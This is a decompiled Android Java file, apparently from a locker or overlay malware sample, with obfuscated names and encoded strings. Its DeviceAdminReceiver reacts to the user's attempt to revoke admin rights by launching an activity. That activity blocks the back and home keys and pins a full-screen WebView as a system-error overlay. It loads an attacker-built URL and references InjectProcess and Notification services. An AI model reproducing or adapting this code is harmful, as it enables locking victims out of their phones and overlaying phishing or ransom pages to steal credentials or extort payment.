package perion.app.sebgdferxdsfet.ghhsfer;

import android.app.Activity;
import android.app.admin.DeviceAdminReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.view.KeyEvent;
import android.view.View;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.webkit.WebView;
import fsdfsdf.gsdsfsf.gjhghjg.lbljhkjblkjblkjblkj.f;

public class CCLoker extends DeviceAdminReceiver {

    public class mainActivity extends Activity {
        rthrthrtjrtjrjtdcbcvbc fsafsdfsfsdfsfsdfsd = new rthrthrtjrtjrjtdcbcvbc();
        private View sdfsdfsdfsdf;
        private WebView zxcvxvsdvsvsvs;

        public void onBackPressed() {
        }

        public void onCreate(Bundle bundle) {
            super.onCreate(bundle);
            setContentView((int) R.layout.webview);
        }

        public void onDestroy() {
            super.onDestroy();
            stopService(new Intent(this, InjectProcess.class));
            stopService(new Intent(this, Notification.class));
        }

        public boolean onKeyDown(int i, KeyEvent keyEvent) {
            if (i == 3) {
            }
            return true;
        }

        public boolean onKeyUp(int i, KeyEvent keyEvent) {
            if (i == 3) {
            }
            return true;
        }

        /* access modifiers changed from: protected */
        public void onPause() {
            super.onStop();
            finish();
        }

        /* access modifiers changed from: protected */
        public void onStart() {
            super.onStart();
            String stringExtra = getIntent().getStringExtra(f.fsafsdfsfsdfsfsdfsd("\u0015U\f"));
            this.zxcvxvsdvsvsvs = (WebView) findViewById(R.id.webView);
            this.zxcvxvsdvsvsvs.getSettings().setJavaScriptEnabled(true);
            this.zxcvxvsdvsvsvs.loadUrl(new StringBuilder().insert(0, stringExtra).append(uiiliuluiiuluilulu.fsafsdfsfsdfsfsdfsd("7L\u001aM\u0012G\u001c\u00068j7F\u0010L\t\u0006DYF")).append(this.fsafsdfsfsdfsfsdfsd.fsafsdfsfsdfsfsdfsd(this)).toString());
            WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams();
            this.sdfsdfsdfsdf = this.zxcvxvsdvsvsvs;
            ((ViewGroup) this.sdfsdfsdfsdf.getParent()).removeView(this.sdfsdfsdfsdf);
            layoutParams.type = 2010;
            ((WindowManager) getApplicationContext().getSystemService(f.fsafsdfsfsdfsfsdfsd("p)i$h7"))).addView(this.sdfsdfsdfsdf, layoutParams);
            this.zxcvxvsdvsvsvs.setWebViewClient(new ertertetetetete(this));
        }

        /* access modifiers changed from: protected */
        public void onStop() {
            super.onStop();
            finish();
        }

        public void onWindowFocusChanged(boolean z) {
            super.onWindowFocusChanged(z);
            if (!z) {
                sendBroadcast(new Intent(uiiliuluiiuluilulu.fsafsdfsfsdfsfsdfsd("H\u0015M\tF\u0012MU@\u0015]\u001eG\u000f\u0007\u001aJ\u000f@\u0014GUj7f(l$z\"z/l6v?`:e4n(")));
            }
        }
    }

    public CharSequence onDisableRequested(Context context, Intent intent) {
        Intent intent2 = new Intent(context, mainActivity.class);
        intent2.addFlags(268435456);
        context.startActivity(intent2);
        return "";
    }

    public void onDisabled(Context context, Intent intent) {
    }

    public void onEnabled(Context context, Intent intent) {
    }
}
